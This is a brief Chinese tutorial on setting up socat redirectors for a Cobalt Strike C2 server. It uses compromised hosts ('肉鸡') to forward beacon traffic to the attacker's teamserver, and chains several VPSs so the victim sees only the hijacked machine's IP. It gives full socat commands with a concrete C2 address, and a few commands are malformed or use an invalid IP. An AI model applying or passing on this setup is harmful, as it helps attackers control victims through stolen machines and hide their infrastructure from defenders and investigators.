- 工作原理
受害者只与那台做重定向的机器通信,重定向机器只会转发来自 beacon 的特定流量到C2控制端主机
具体实现:一台VPS作为转发机器,一台VPS作为 Teamserver。
转发机器:抓的鸡
Teamserver:自己的攻击机
2.先安装一个socat,直接apt install socat。
socat -d -d -d -d -lh -v -lf /var/log/socat.log TCP4-LISTEN:80,fork TCP4:C2服务器ip:C2服务器监听Port
常用选项:
-lh 将主机名添加到日志消息
-v 详细数据流量,文本
-x 详细数据流量,十六进制
-d 增加详细程度(最多使用4次;建议使用2次)
-lf <logfile> 记录到文件
3.开启转发,把肉鸡的801的流量转发到攻击机上,攻击机的cs上生成的payload是ip是弱鸡的。
socat -d -d -d -d -lh -v -lf /var/log/socat.log TCP4-LISTEN:801,fork TCP4:43.139.44.143:801
4.执行payload上线,发现是肉鸡的ip地址。再大鲨鱼抓个流量包分析下,发现还是肉鸡的流量。
多层转发
假设有多台的vps,使用socat进行套娃的转发。
第一个是香港的服务器,下面这个命令是将香港的vps的流量转发去第二台的vps的801端口上。
socat -d -d -d -d -lh -v -lf /var/log/socat.log TCP4-LISTEN:801,forkTCP4:43.139.44.143:801
然后在43.13这台vps上执行下面的命令,意思是将在第一台的vps上接受到的流量,通过801端口继续转发去第三台的vps的7788端口上。
socat -d -d -d -d -lh -v -lf /var/log/socat.log TCP4-LISTEN:801,forkTCP4:111.333.666.999:7788